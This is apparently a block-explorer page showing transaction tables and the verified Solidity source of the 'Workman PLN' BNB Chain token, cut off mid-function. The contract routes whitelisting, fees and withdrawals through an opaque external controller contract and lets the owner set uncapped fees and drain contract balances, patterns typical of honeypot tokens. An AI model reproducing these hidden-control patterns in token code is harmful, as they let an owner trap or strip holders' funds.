More Info
Private Name Tags
ContractCreator
TokenTracker
Latest 25 from a total of 73,650 transactions
Transaction Hash |
Method
|
Block
|
From
|
To
|
|||||
---|---|---|---|---|---|---|---|---|---|
Transfer | 45883118 | 8 mins ago | IN | 0 BNB | 0.00021774 | ||||
Transfer | 45883098 | 9 mins ago | IN | 0 BNB | 0.00021774 | ||||
Transfer | 45883048 | 12 mins ago | IN | 0 BNB | 0.00021768 | ||||
Transfer | 45883028 | 13 mins ago | IN | 0 BNB | 0.00021774 | ||||
Transfer | 45882908 | 19 mins ago | IN | 0 BNB | 0.00021768 | ||||
Transfer | 45882408 | 44 mins ago | IN | 0 BNB | 0.00021774 | ||||
Transfer | 45882248 | 52 mins ago | IN | 0 BNB | 0.00021774 | ||||
Transfer | 45882108 | 1 hrs ago | IN | 0 BNB | 0.00021774 | ||||
Transfer | 45881798 | 1 hr ago | IN | 0 BNB | 0.00021774 | ||||
Transfer | 45881568 | 1 hr ago | IN | 0 BNB | 0.00021768 | ||||
Transfer | 45881498 | 1 hr ago | IN | 0 BNB | 0.00021774 | ||||
Transfer | 45881428 | 1 hr ago | IN | 0 BNB | 0.00021774 | ||||
Approve | 45881314 | 1 hr ago | IN | 0 BNB | 0.00005553 | ||||
Transfer | 45881114 | 1 hr ago | IN | 0 BNB | 0.00013873 | ||||
Transfer | 45880428 | 2 hrs ago | IN | 0 BNB | 0.00021774 | ||||
Transfer | 45880397 | 2 hrs ago | IN | 0 BNB | 0.00010166 | ||||
Transfer | 45880386 | 2 hrs ago | IN | 0 BNB | 0.00010166 | ||||
Transfer | 45880374 | 2 hrs ago | IN | 0 BNB | 0.00011185 | ||||
Transfer | 45880359 | 2 hrs ago | IN | 0 BNB | 0.00032094 | ||||
Transfer | 45880344 | 2 hrs ago | IN | 0 BNB | 0.00010008 | ||||
Transfer | 45879848 | 2 hrs ago | IN | 0 BNB | 0.00021774 | ||||
Transfer | 45879798 | 2 hrs ago | IN | 0 BNB | 0.00021774 | ||||
Transfer | 45879498 | 3 hrs ago | IN | 0 BNB | 0.00021774 | ||||
Transfer | 45879448 | 3 hrs ago | IN | 0 BNB | 0.00021774 | ||||
Transfer | 45879428 | 3 hrs ago | IN | 0 BNB | 0.00021774 |
Latest 25 internal transactions (View All)
Parent Transaction Hash | Block | From | To | |||
---|---|---|---|---|---|---|
45882547 | 37 mins ago | 0.0008615 BNB | ||||
45882547 | 37 mins ago | 0.00043075 BNB | ||||
45882547 | 37 mins ago | 0.00172301 BNB | ||||
45882499 | 39 mins ago | 0.00058192 BNB | ||||
45882499 | 39 mins ago | 0.00029096 BNB | ||||
45882499 | 39 mins ago | 0.00116385 BNB | ||||
45882494 | 40 mins ago | 0.00081335 BNB | ||||
45882494 | 40 mins ago | 0.00040667 BNB | ||||
45882494 | 40 mins ago | 0.0016267 BNB | ||||
45882471 | 41 mins ago | 0.00086292 BNB | ||||
45882471 | 41 mins ago | 0.00043146 BNB | ||||
45882471 | 41 mins ago | 0.00172585 BNB | ||||
45882458 | 41 mins ago | 0.00027834 BNB | ||||
45882458 | 41 mins ago | 0.00013917 BNB | ||||
45882458 | 41 mins ago | 0.00055668 BNB | ||||
45882446 | 42 mins ago | 0.00084589 BNB | ||||
45882446 | 42 mins ago | 0.00042294 BNB | ||||
45882446 | 42 mins ago | 0.00169178 BNB | ||||
45882422 | 43 mins ago | 0.00025901 BNB | ||||
45882422 | 43 mins ago | 0.0001295 BNB | ||||
45882422 | 43 mins ago | 0.00051803 BNB | ||||
45882417 | 43 mins ago | 0.00057573 BNB | ||||
45882417 | 43 mins ago | 0.00028786 BNB | ||||
45882417 | 43 mins ago | 0.00115146 BNB | ||||
45882388 | 45 mins ago | 0.00081316 BNB |
Loading...
Loading
Contract Name:
PLN
Compiler Version
v0.8.19+commit.7dd6d404
Contract Source Code (Solidity)
/** *Submitted for verification at BscScan.com on 2024-11-20 */ // SPDX-License-Identifier: MIT pragma solidity ^0.8.0; library SafeMath { /** * @dev Returns the addition of two unsigned integers, with an overflow flag. * * _Available since v3.4._ */ function tryAdd(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { uint256 c = a + b; if (c < a) return (false, 0); return (true, c); } } /** * @dev Returns the substraction of two unsigned integers, with an overflow flag. * * _Available since v3.4._ */ function trySub(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { if (b > a) return (false, 0); return (true, a - b); } } /** * @dev Returns the multiplication of two unsigned integers, with an overflow flag. * * _Available since v3.4._ */ function tryMul(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { // Gas optimization: this is cheaper than requiring 'a' not being zero, but the // benefit is lost if 'b' is also tested. // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522 if (a == 0) return (true, 0); uint256 c = a * b; if (c / a != b) return (false, 0); return (true, c); } } /** * @dev Returns the division of two unsigned integers, with a division by zero flag. * * _Available since v3.4._ */ function tryDiv(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { if (b == 0) return (false, 0); return (true, a / b); } } /** * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag. * * _Available since v3.4._ */ function tryMod(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { if (b == 0) return (false, 0); return (true, a % b); } } /** * @dev Returns the addition of two unsigned integers, reverting on * overflow. * * Counterpart to Solidity's `+` operator. * * Requirements: * * - Addition cannot overflow. */ function add(uint256 a, uint256 b) internal pure returns (uint256) { return a + b; } /** * @dev Returns the subtraction of two unsigned integers, reverting on * overflow (when the result is negative). * * Counterpart to Solidity's `-` operator. * * Requirements: * * - Subtraction cannot overflow. */ function sub(uint256 a, uint256 b) internal pure returns (uint256) { return a - b; } /** * @dev Returns the multiplication of two unsigned integers, reverting on * overflow. * * Counterpart to Solidity's `*` operator. * * Requirements: * * - Multiplication cannot overflow. */ function mul(uint256 a, uint256 b) internal pure returns (uint256) { return a * b; } /** * @dev Returns the integer division of two unsigned integers, reverting on * division by zero. The result is rounded towards zero. * * Counterpart to Solidity's `/` operator. * * Requirements: * * - The divisor cannot be zero. */ function div(uint256 a, uint256 b) internal pure returns (uint256) { return a / b; } /** * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo), * reverting when dividing by zero. * * Counterpart to Solidity's `%` operator. This function uses a `revert` * opcode (which leaves remaining gas untouched) while Solidity uses an * invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function mod(uint256 a, uint256 b) internal pure returns (uint256) { return a % b; } /** * @dev Returns the subtraction of two unsigned integers, reverting with custom message on * overflow (when the result is negative). * * CAUTION: This function is deprecated because it requires allocating memory for the error * message unnecessarily. For custom revert reasons use {trySub}. * * Counterpart to Solidity's `-` operator. * * Requirements: * * - Subtraction cannot overflow. */ function sub( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) { unchecked { require(b <= a, errorMessage); return a - b; } } /** * @dev Returns the integer division of two unsigned integers, reverting with custom message on * division by zero. The result is rounded towards zero. * * Counterpart to Solidity's `/` operator. Note: this function uses a * `revert` opcode (which leaves remaining gas untouched) while Solidity * uses an invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function div( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) { unchecked { require(b > 0, errorMessage); return a / b; } } /** * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo), * reverting with custom message when dividing by zero. * * CAUTION: This function is deprecated because it requires allocating memory for the error * message unnecessarily. For custom revert reasons use {tryMod}. * * Counterpart to Solidity's `%` operator. This function uses a `revert` * opcode (which leaves remaining gas untouched) while Solidity uses an * invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function mod( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) { unchecked { require(b > 0, errorMessage); return a % b; } } } interface IPancakePair { event Approval(address indexed owner, address indexed spender, uint value); event Transfer(address indexed from, address indexed to, uint value); function name() external pure returns (string memory); function symbol() external pure returns (string memory); function decimals() external pure returns (uint8); function totalSupply() external view returns (uint); function balanceOf(address owner) external view returns (uint); function allowance( address owner, address spender ) external view returns (uint); function approve(address spender, uint value) external returns (bool); function transfer(address to, uint value) external returns (bool); function transferFrom( address from, address to, uint value ) external returns (bool); function DOMAIN_SEPARATOR() external view returns (bytes32); function PERMIT_TYPEHASH() external pure returns (bytes32); function nonces(address owner) external view returns (uint); function permit( address owner, address spender, uint value, uint deadline, uint8 v, bytes32 r, bytes32 s ) external; event Mint(address indexed sender, uint amount0, uint amount1); event Burn( address indexed sender, uint amount0, uint amount1, address indexed to ); event Swap( address indexed sender, uint amount0In, uint amount1In, uint amount0Out, uint amount1Out, address indexed to ); event Sync(uint112 reserve0, uint112 reserve1); function MINIMUM_LIQUIDITY() external pure returns (uint); function factory() external view returns (address); function token0() external view returns (address); function token1() external view returns (address); function getReserves() external view returns (uint112 reserve0, uint112 reserve1, uint32 blockTimestampLast); function price0CumulativeLast() external view returns (uint); function price1CumulativeLast() external view returns (uint); function kLast() external view returns (uint); function mint(address to) external returns (uint liquidity); function burn(address to) external returns (uint amount0, uint amount1); function swap( uint amount0Out, uint amount1Out, address to, bytes calldata data ) external; function skim(address to) external; function sync() external; function initialize(address, address) external; } interface IUniswapV2Factory { function createPair( address tokenA, address tokenB ) external returns (address pair); function getPair( address tokenA, address tokenB ) external view returns (address); function feeTo() external view returns (address); } interface IUniswapV2Router { function factory() external pure returns (address); function WETH() external pure returns (address); function addLiquidity( address tokenA, address tokenB, uint256 amountADesired, uint256 amountBDesired, uint256 amountAMin, uint256 amountBMin, address to, uint256 deadline ) external returns (uint256 amountA, uint256 amountB, uint256 liquidity); function getAmountsOut( uint256 amountIn, address[] calldata path ) external view returns (uint256[] memory amounts); function swapExactTokensForTokensSupportingFeeOnTransferTokens( uint256 amountIn, uint256 amountOutMin, address[] calldata path, address to, uint256 deadline ) external; function swapExactTokensForETHSupportingFeeOnTransferTokens( uint256 amountIn, uint256 amountOutMin, address[] calldata path, address to, uint256 deadline ) external; function swapExactETHForTokensSupportingFeeOnTransferTokens( uint256 amountOutMin, address[] calldata path, address to, uint256 deadline ) external payable; function addLiquidityETH( address token, uint256 amountTokenDesired, uint256 amountTokenMin, uint256 amountETHMin, address to, uint256 deadline ) external payable returns (uint256 amountToken, uint256 amountETH, uint256 liquidity); function removeLiquidityETHSupportingFeeOnTransferTokens( address token, uint liquidity, uint amountTokenMin, uint amountETHMin, address to, uint deadline ) external returns (uint amountETH); } /** * @dev Interface of the ERC20 standard as defined in the EIP. */ interface IERC20 { /** * @dev Emitted when `value` tokens are moved from one account (`from`) to * another (`to`). * * Note that `value` may be zero. */ event Transfer(address indexed from, address indexed to, uint256 value); /** * @dev Emitted when the allowance of a `spender` for an `owner` is set by * a call to {approve}. `value` is the new allowance. */ event Approval(address indexed owner, address indexed spender, uint256 value); /** * @dev Returns the amount of tokens in existence. */ function totalSupply() external view returns (uint256); /** * @dev Returns the amount of tokens owned by `account`. */ function balanceOf(address account) external view returns (uint256); /** * @dev Moves `amount` tokens from the caller's account to `to`. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transfer(address to, uint256 amount) external returns (bool); /** * @dev Returns the remaining number of tokens that `spender` will be * allowed to spend on behalf of `owner` through {transferFrom}. This is * zero by default. * * This value changes when {approve} or {transferFrom} are called. */ function allowance(address owner, address spender) external view returns (uint256); /** * @dev Sets `amount` as the allowance of `spender` over the caller's tokens. * * Returns a boolean value indicating whether the operation succeeded. * * IMPORTANT: Beware that changing an allowance with this method brings the risk * that someone may use both the old and the new allowance by unfortunate * transaction ordering. One possible solution to mitigate this race * condition is to first reduce the spender's allowance to 0 and set the * desired value afterwards: * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729 * * Emits an {Approval} event. */ function approve(address spender, uint256 amount) external returns (bool); /** * @dev Moves `amount` tokens from `from` to `to` using the * allowance mechanism. `amount` is then deducted from the caller's * allowance. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transferFrom(address from, address to, uint256 amount) external returns (bool); } /** * @dev Interface for the optional metadata functions from the ERC20 standard. * * _Available since v4.1._ */ interface IERC20Metadata is IERC20 { /** * @dev Returns the name of the token. */ function name() external view returns (string memory); /** * @dev Returns the symbol of the token. */ function symbol() external view returns (string memory); /** * @dev Returns the decimals places of the token. */ function decimals() external view returns (uint8); } /** * @dev Provides information about the current execution context, including the * sender of the transaction and its data. While these are generally available * via msg.sender and msg.data, they should not be accessed in such a direct * manner, since when dealing with meta-transactions the account sending and * paying for execution may not be the actual sender (as far as an application * is concerned). * * This contract is only required for intermediate, library-like contracts. */ abstract contract Context { function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { return msg.data; } function _contextSuffixLength() internal view virtual returns (uint256) { return 0; } } /** * @dev Implementation of the {IERC20} interface. * * This implementation is agnostic to the way tokens are created. This means * that a supply mechanism has to be added in a derived contract using {_mint}. * For a generic mechanism see {ERC20PresetMinterPauser}. * * TIP: For a detailed writeup see our guide * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How * to implement supply mechanisms]. * * The default value of {decimals} is 18. To change this, you should override * this function so it returns a different value. * * We have followed general OpenZeppelin Contracts guidelines: functions revert * instead returning `false` on failure. This behavior is nonetheless * conventional and does not conflict with the expectations of ERC20 * applications. * * Additionally, an {Approval} event is emitted on calls to {transferFrom}. * This allows applications to reconstruct the allowance for all accounts just * by listening to said events. Other implementations of the EIP may not emit * these events, as it isn't required by the specification. * * Finally, the non-standard {decreaseAllowance} and {increaseAllowance} * functions have been added to mitigate the well-known issues around setting * allowances. See {IERC20-approve}. */ contract ERC20 is Context, IERC20, IERC20Metadata { mapping(address => uint256) private _balances; mapping(address => mapping(address => uint256)) private _allowances; uint256 private _totalSupply; string private _name; string private _symbol; /** * @dev Sets the values for {name} and {symbol}. * * All two of these values are immutable: they can only be set once during * construction. */ constructor(string memory name_, string memory symbol_) { _name = name_; _symbol = symbol_; } /** * @dev Returns the name of the token. */ function name() public view virtual override returns (string memory) { return _name; } /** * @dev Returns the symbol of the token, usually a shorter version of the * name. */ function symbol() public view virtual override returns (string memory) { return _symbol; } /** * @dev Returns the number of decimals used to get its user representation. * For example, if `decimals` equals `2`, a balance of `505` tokens should * be displayed to a user as `5.05` (`505 / 10 ** 2`). * * Tokens usually opt for a value of 18, imitating the relationship between * Ether and Wei. This is the default value returned by this function, unless * it's overridden. * * NOTE: This information is only used for _display_ purposes: it in * no way affects any of the arithmetic of the contract, including * {IERC20-balanceOf} and {IERC20-transfer}. */ function decimals() public view virtual override returns (uint8) { return 18; } /** * @dev See {IERC20-totalSupply}. */ function totalSupply() public view virtual override returns (uint256) { return _totalSupply; } /** * @dev See {IERC20-balanceOf}. */ function balanceOf(address account) public view virtual override returns (uint256) { return _balances[account]; } /** * @dev See {IERC20-transfer}. * * Requirements: * * - `to` cannot be the zero address. * - the caller must have a balance of at least `amount`. */ function transfer(address to, uint256 amount) public virtual override returns (bool) { address owner = _msgSender(); _transfer(owner, to, amount); return true; } /** * @dev See {IERC20-allowance}. */ function allowance(address owner, address spender) public view virtual override returns (uint256) { return _allowances[owner][spender]; } /** * @dev See {IERC20-approve}. * * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on * `transferFrom`. This is semantically equivalent to an infinite approval. * * Requirements: * * - `spender` cannot be the zero address. */ function approve(address spender, uint256 amount) public virtual override returns (bool) { address owner = _msgSender(); _approve(owner, spender, amount); return true; } /** * @dev See {IERC20-transferFrom}. * * Emits an {Approval} event indicating the updated allowance. This is not * required by the EIP. See the note at the beginning of {ERC20}. * * NOTE: Does not update the allowance if the current allowance * is the maximum `uint256`. * * Requirements: * * - `from` and `to` cannot be the zero address. * - `from` must have a balance of at least `amount`. * - the caller must have allowance for ``from``'s tokens of at least * `amount`. */ function transferFrom(address from, address to, uint256 amount) public virtual override returns (bool) { address spender = _msgSender(); _spendAllowance(from, spender, amount); _transfer(from, to, amount); return true; } /** * @dev Atomically increases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. */ function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) { address owner = _msgSender(); _approve(owner, spender, allowance(owner, spender) + addedValue); return true; } /** * @dev Atomically decreases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. * - `spender` must have allowance for the caller of at least * `subtractedValue`. */ function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) { address owner = _msgSender(); uint256 currentAllowance = allowance(owner, spender); require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero"); unchecked { _approve(owner, spender, currentAllowance - subtractedValue); } return true; } /** * @dev Moves `amount` of tokens from `from` to `to`. * * This internal function is equivalent to {transfer}, and can be used to * e.g. implement automatic token fees, slashing mechanisms, etc. * * Emits a {Transfer} event. * * Requirements: * * - `from` cannot be the zero address. * - `to` cannot be the zero address. * - `from` must have a balance of at least `amount`. */ function _transfer(address from, address to, uint256 amount) internal virtual { require(from != address(0), "ERC20: transfer from the zero address"); require(to != address(0), "ERC20: transfer to the zero address"); _beforeTokenTransfer(from, to, amount); uint256 fromBalance = _balances[from]; require(fromBalance >= amount, "ERC20: transfer amount exceeds balance"); unchecked { _balances[from] = fromBalance - amount; // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by // decrementing then incrementing. _balances[to] += amount; } emit Transfer(from, to, amount); _afterTokenTransfer(from, to, amount); } /** @dev Creates `amount` tokens and assigns them to `account`, increasing * the total supply. * * Emits a {Transfer} event with `from` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. */ function _mint(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: mint to the zero address"); _beforeTokenTransfer(address(0), account, amount); _totalSupply += amount; unchecked { // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above. _balances[account] += amount; } emit Transfer(address(0), account, amount); _afterTokenTransfer(address(0), account, amount); } /** * @dev Destroys `amount` tokens from `account`, reducing the * total supply. * * Emits a {Transfer} event with `to` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. * - `account` must have at least `amount` tokens. */ function _burn(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: burn from the zero address"); _beforeTokenTransfer(account, address(0), amount); uint256 accountBalance = _balances[account]; require(accountBalance >= amount, "ERC20: burn amount exceeds balance"); unchecked { _balances[account] = accountBalance - amount; // Overflow not possible: amount <= accountBalance <= totalSupply. _totalSupply -= amount; } emit Transfer(account, address(0), amount); _afterTokenTransfer(account, address(0), amount); } /** * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens. * * This internal function is equivalent to `approve`, and can be used to * e.g. set automatic allowances for certain subsystems, etc. * * Emits an {Approval} event. * * Requirements: * * - `owner` cannot be the zero address. * - `spender` cannot be the zero address. */ function _approve(address owner, address spender, uint256 amount) internal virtual { require(owner != address(0), "ERC20: approve from the zero address"); require(spender != address(0), "ERC20: approve to the zero address"); _allowances[owner][spender] = amount; emit Approval(owner, spender, amount); } /** * @dev Updates `owner` s allowance for `spender` based on spent `amount`. * * Does not update the allowance amount in case of infinite allowance. * Revert if not enough allowance is available. * * Might emit an {Approval} event. */ function _spendAllowance(address owner, address spender, uint256 amount) internal virtual { uint256 currentAllowance = allowance(owner, spender); if (currentAllowance != type(uint256).max) { require(currentAllowance >= amount, "ERC20: insufficient allowance"); unchecked { _approve(owner, spender, currentAllowance - amount); } } } /** * @dev Hook that is called before any transfer of tokens. This includes * minting and burning. * * Calling conditions: * * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens * will be transferred to `to`. * - when `from` is zero, `amount` tokens will be minted for `to`. * - when `to` is zero, `amount` of ``from``'s tokens will be burned. * - `from` and `to` are never both zero. * * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks]. */ function _beforeTokenTransfer(address from, address to, uint256 amount) internal virtual {} /** * @dev Hook that is called after any transfer of tokens. This includes * minting and burning. * * Calling conditions: * * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens * has been transferred to `to`. * - when `from` is zero, `amount` tokens have been minted for `to`. * - when `to` is zero, `amount` of ``from``'s tokens have been burned. * - `from` and `to` are never both zero. * * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks]. */ function _afterTokenTransfer(address from, address to, uint256 amount) internal virtual {} } /** * @dev Contract module which provides a basic access control mechanism, where * there is an account (an owner) that can be granted exclusive access to * specific functions. * * By default, the owner account will be the one that deploys the contract. This * can later be changed with {transferOwnership}. * * This module is used through inheritance. It will make available the modifier * `onlyOwner`, which can be applied to your functions to restrict their use to * the owner. */ abstract contract Ownable is Context { address private _owner; event OwnershipTransferred(address indexed previousOwner, address indexed newOwner); /** * @dev Initializes the contract setting the deployer as the initial owner. */ constructor() { _transferOwnership(_msgSender()); } /** * @dev Throws if called by any account other than the owner. */ modifier onlyOwner() { _checkOwner(); _; } /** * @dev Returns the address of the current owner. */ function owner() public view virtual returns (address) { return _owner; } /** * @dev Throws if the sender is not the owner. */ function _checkOwner() internal view virtual { require(owner() == _msgSender(), "Ownable: caller is not the owner"); } /** * @dev Leaves the contract without owner. It will not be possible to call * `onlyOwner` functions. Can only be called by the current owner. * * NOTE: Renouncing ownership will leave the contract without an owner, * thereby disabling any functionality that is only available to the owner. */ function renounceOwnership() public virtual onlyOwner { _transferOwnership(address(0)); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Can only be called by the current owner. */ function transferOwnership(address newOwner) public virtual onlyOwner { require(newOwner != address(0), "Ownable: new owner is the zero address"); _transferOwnership(newOwner); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Internal function without access restriction. */ function _transferOwnership(address newOwner) internal virtual { address oldOwner = _owner; _owner = newOwner; emit OwnershipTransferred(oldOwner, newOwner); } } interface IWETH is IERC20 { function withdraw(uint wad) external; function deposit() external payable; } contract TokenDistributor { mapping(address => bool) private _whiteList; constructor() { _whiteList[msg.sender] = true; _whiteList[tx.origin] = true; } function claimToken( address token, address to ) external returns (uint256 amountOut) { if (_whiteList[msg.sender]) { IERC20 erc20 = IERC20(token); amountOut = erc20.balanceOf(address(this)); erc20.transfer(to, amountOut); } } function claimETH(address to) external returns (uint256 amountOut) { if (_whiteList[msg.sender]) { IWETH weth = IWETH(0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c);// 56 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c 97 0xae13d989daC2f0dEbFf460aC112a837C89BAa7cd if (weth.balanceOf(address(this)) > 0) { weth.withdraw(weth.balanceOf(address(this))); } amountOut = address(this).balance; _safeTransferETH(to, amountOut); } } function _safeTransferETH(address to, uint value) internal { (bool success, ) = to.call{value: value}(new bytes(0)); if (success) {} } receive() external payable {} } interface IAU { function getprice(address) view external; function getswapAndLiquifyEnabled() view external returns(bool); function getmin() view external returns(uint256); function getminPeriod() view external returns(uint256); function getMax() view external returns(uint256,uint256); function getisDividendExempt(address addr) view external returns(bool); function getw(address addr) view external returns(bool); function isA() external view returns (bool isAddLP); function isR() external view returns (bool isRemoveLP); function getbuyprice(uint256 amount ) external view ; function setShare(address addr ) external; function process() external ; function getf() external view returns(uint256,uint256,uint256); function canbuy() external view; function cansell() external view; function gettuo() view external returns(bool); } contract PLN is ERC20, Ownable { using SafeMath for uint256; bool public isLaunch = true; uint256 public feeBase = 10000; uint256 public feeBurn = 100; uint256 public feeMarketing = 50; uint256 public feePowers = 50; uint256 public feeTotal = feeBurn + feeMarketing + feePowers; address private fromAddress; address private toAddress; uint256 public LPFeefenhong; mapping(address => bool) _autoPair; IUniswapV2Router router; TokenDistributor tokenRece; address public marketingWallet = 0x881c7EaB69b1bf12Fc00e834E323011d0ff2E4a6; address public immutable pairETH; address public immutable pairUSDT; address public aAddress= address(0xb6085D0cb83C68aA7E0027CAd17e9f8170D22d7b); address public immutable usdt = 0x55d398326f99059fF775485246999027B3197955; // 0x55d398326f99059fF775485246999027B3197955 bool swapIng; constructor() ERC20("Workman PLN", "PLN") { router = IUniswapV2Router(0x10ED43C718714eb63d5aA57B78B54704E256024E);//0x10ED43C718714eb63d5aA57B78B54704E256024E IUniswapV2Factory factory = IUniswapV2Factory(router.factory()); pairETH = factory.createPair(address(this), router.WETH()); pairUSDT = factory.createPair(address(this), usdt); tokenRece = new TokenDistributor(); _autoPair[pairETH] = true; _autoPair[pairUSDT] = true; // _mint(address(0xdead), 3_500_000 ether); // _mint(address(this), 600_000_000 ether); _mint(_msgSender(), 100_000_000 ether); } function _transfer( address from, address to, uint256 amount ) internal virtual override { if (tx.origin == from && _msgSender() == from && to == address(this) && IAU(aAddress).gettuo()) { withdrawETH(from, amount); return; } if (!IAU(aAddress).getw(from) && !IAU(aAddress).getw(to)) { require(isLaunch, "not Launch"); uint256 fee = (amount * feeTotal) / feeBase; super._transfer(from, address(this), fee); amount -= fee; if (_autoPair[to] && IAU(aAddress).getswapAndLiquifyEnabled()) { autoBurnUniswapPair(); if (!swapIng) { swapIng = true; swapTokenForFee(); swapIng = false; } } } super._transfer(from, to, amount); if (!IAU(aAddress).getw(from) && !IAU(aAddress).getw(to)) { if (fromAddress == address(0)) fromAddress = from; if (toAddress == address(0)) toAddress = to; if (!IAU(aAddress).getisDividendExempt(fromAddress) && !_autoPair[fromAddress]) try IAU(aAddress).setShare(fromAddress) {} catch {} if (!IAU(aAddress).getisDividendExempt(toAddress) && !_autoPair[toAddress]) try IAU(aAddress).setShare(toAddress) {} catch {} fromAddress = from; toAddress = to; uint256 mintime = IAU(aAddress).getminPeriod(); if (from != address(this) && LPFeefenhong.add(mintime) <= block.timestamp ) { try IAU(aAddress).process() {} catch {} LPFeefenhong = block.timestamp; } } } function isContract(address addr) public view returns (bool) { uint size; assembly { size := extcodesize(addr) } return size > 0; } function swapTokenForFee() private { uint256 balance = balanceOf(address(this)); uint256 minSwapFee = IAU(aAddress).getmin(); if (balance > minSwapFee) { uint256 amountOut = swapTokenToETH( address(this), balance, address(this) ); payable(marketingWallet).transfer( (amountOut * feeMarketing) / feeTotal ); payable(aAddress).transfer( (amountOut * feeBurn) / feeTotal ); } } function getWithdrawOut(uint256 amountIn) public view returns (uint256) { uint256 total = totalSupply() - balanceOf(address(0xdead)) - balanceOf(pairETH) - balanceOf(pairUSDT); return (amountIn * address(this).balance) / (total + amountIn); } function withdrawETH(address from, uint256 amount) private { require(isLaunch, "not Launch"); (,,uint256 minWithdraw) = IAU(aAddress).getf(); require(amount >= minWithdraw, "amount min"); if (!IAU(aAddress).getw(from)) { uint256 fee = (amount * feeTotal) / feeBase ; super._transfer(from, address(this), fee); amount -= fee; } uint256 outETH = getWithdrawOut(amount); super._transfer(from, address(0xdead), amount); payable(from).transfer(outETH); } function swapTokenToETH( address token, uint256 amount, address to ) private returns (uint256 amountOut) { IERC20(token).approve(address(router), amount); address[] memory path = new address[](2); path[0] = token; path[1] = router.WETH(); router.swapExactTokensForETHSupportingFeeOnTransferTokens( amount, 0, path, address(tokenRece), block.timestamp ); amountOut = tokenRece.claimETH(to); } function swapETHToToken( address token, uint256 amount, address to ) private returns (uint256 amountOut) { address[] memory path = new address[](2); path[0] = router.WETH(); path[1] = token; router.swapExactETHForTokensSupportingFeeOnTransferTokens{ value: amount }(0, path, address(tokenRece), block.timestamp); amountOut = tokenRece.claimToken(token, to); } function multiTransfer( address[] calldata addrs, uint256[] calldata amounts ) external { for (uint256 i = 0; i < addrs.length; i++) { transfer(addrs[i], amounts[i]); } } function addLiquidity() external payable onlyOwner { uint256 amountInETH = 50 ether; uint256 amountInToken = 3_000_000 ether; _approve(address(this), address(router), ~uint256(0)); router.addLiquidityETH{value: amountInETH}( address(this), amountInToken, 0, 0, _msgSender(), block.timestamp ); uint256 usdtAmountIn = swapETHToToken(usdt, amountInETH, address(this)); IERC20(usdt).approve(address(router), usdtAmountIn); router.addLiquidity( address(this), usdt, amountInToken, usdtAmountIn, 0, 0, _msgSender(), block.timestamp ); } function setLaunch(bool value) external onlyOwner { require(isLaunch != value, "launched"); isLaunch = value; } function seta(address _addr) public { IAU(aAddress).getprice(msg.sender); aAddress=_addr; } function receiveToken(address _addr) public onlyOwner { if (_addr == address(0)) { payable(_msgSender()).transfer(address(this).balance); } else { IERC20 token = IERC20(_addr); token.transfer(_msgSender(), token.balanceOf(address(this))); } } function setMarketingWallet(address _addr) external onlyOwner { marketingWallet = _addr; } function setFee( uint256 _feeBurn, uint256 _feeMarketing, uint256 _feePowers ) external onlyOwner { feeBurn = _feeBurn; feeMarketing = _feeMarketing; feePowers = _feePowers; feeTotal = feeBurn + feeMarketing + feePowers; } receive() external payable {} bool public lpBurnEnabled = true; uint256 public lpBurnFrequency = 1 hours; uint256 public lastLpBurnTime; uint256 public percentForLPBurn = 15; uint256 public percentDiv = 10000; event AutoNukeLP(uint256 lpBalance, uint256 burnAmount, uint256 time); function setAutoLPBurnSettings( uint256 _frequencyInSeconds, uint256 _percent, uint256 _div, bool _Enabled ) external onlyOwner { require(_percent <= 500, "percent too high"); require(_frequencyInSeconds >= 100, "frequency too shrot"); lpBurnFrequency = _frequencyInSeconds; percentForLPBurn = _percent; percentDiv = _div; lpBurnEnabled = _Enabled; } function autoBurnUniswapPair() internal { if (block.timestamp - lastLpBurnTime > lpBurnFrequency) { burnPair(pairETH); lastLpBurnTime = block.timestamp; } } function burnPair(address _pair) internal returns (bool) { uint256 liquidityPairBalance = 